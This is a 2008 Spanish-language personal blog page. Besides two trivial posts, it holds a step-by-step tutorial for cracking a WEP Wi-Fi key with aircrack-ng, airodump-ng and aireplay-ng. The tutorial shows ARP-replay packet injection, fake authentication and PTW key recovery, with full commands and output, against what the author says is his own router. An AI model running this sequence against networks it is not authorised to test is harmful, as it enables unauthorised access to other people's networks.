28 agosto, 2008

Así hablo Zaratustra

Es el ocio mas audacity... -.-

20 agosto, 2008

Una Duff!x

La imagen dice mas que mil palabras... a quien no se le antoja una rica DUFF!

Photobucket

03 agosto, 2008

reinyeccion de trafico con Linksys wusb54gc chipset ralink modulo rt73




Aqui dejo como inyectar con esta usb WUSB54GC sobre un infinitum de telmex
use debian :P y mi mini itx =)
mini:/home/neo/Desktop# uname -a
Linux mini 2.6.25-2-686 #1 SMP Fri Jul 18 17:46:56 UTC 2008 i686 GNU/Linux


primero y a que tenemos instalada la tarjeta usb tenemos que levantarla con airomon y lo hacemos 2 veces esto para crear 2 interfaces logicas virtuales o como les les llame o.O, en este caso como es mi propio 2wire no cambie la mac xD. noten que se han creado mon0 y mon1


mini:/home/neo# airmon-ng start wlan0


Interface Chipset Driver

wlan0 Ralink 2573 USB rt73usb - [phy0]
(monitor mode enabled on mon0)

mini:/home/neo# airmon-ng start wlan0


Interface Chipset Driver

wlan0 Ralink 2573 USB rt73usb - [phy0]
(monitor mode enabled on mon1)
mon0 Ralink 2573 USB rt73usb - [phy0]

miren el ifconfig
Free Image Hosting at www.ImageShack.us



luego hacemos un scan para saber que redes hay por ahi
mini:/home/neo/Desktop# iwlist wlan0 s
wlan0 Scan completed :
Cell 01 - Address: 00:1E:C7:75:57:99
ESSID:"INFINITUM1003"
Mode:Master
Channel:5
Frequency:2.432 GHz (Channel 5)
Quality=47/100 Signal level=-78 dBm
Encryption key:on
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 6 Mb/s; 9 Mb/s
11 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s
48 Mb/s; 54 Mb/s
Extra:tsf=00000000a25ca7ae

en este caso esta es la red que elegi la mia o.O'
corremos airodump para comenzar a sniffear especifico que sea el canal 5 y que solo capture de un bssid en especifico -w que haga un archivo llamado hola y que use la interfaz de mon0 miren el comando

mini:/home/neo/Desktop# airodump-ng --channel 5 --bssid 00:1E:C7:75:57:99 -w hola mon0

comenzamos con aireplay le digo que mande 1024 paquetes por segunto. el bssid y la mac de mi tarjeta que use las interfaces de mon0 mon1

mini:/home/neo# aireplay-ng --arpreplay -x 1024 -b 00:1E:C7:75:57:99 -h 00:21:29:65:0c:ed -i mon0 mon1


le decimos aireplay que haga una autenticacion falsa -a mac ap -h tumac con mon1
mini:/home/neo# aireplay-ng -1 0 -a 00:1E:C7:75:57:99 -h 00:21:29:65:0c:ed mon1
00:12:40 Waiting for beacon frame (BSSID: 00:1E:C7:75:57:99) on channel 5

00:12:40 Sending Authentication Request (Open System)
00:12:40 Authentication successful
00:12:40 Sending Association Request
00:12:40 Association successful :-) (AID: 1)


ya capturados algunos paquetes comenzamos a crackear con aircrack -z es ptw
mini:/home/neo/Desktop# aircrack-ng -z hola-01.cap
Opening hola-01.cap
Read 125360 packets.

# BSSID ESSID Encryption

1 00:1E:C7:75:57:99 INFINITUM1003 WEP (61768 IVs)

Choosing first network as target.

Opening hola-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 61768 ivs.
KEY FOUND! [ 10:52:47:03:89 ]
Decrypted correctly: 100%

y ahi saca la llave.


By artzneo at 2008-08-03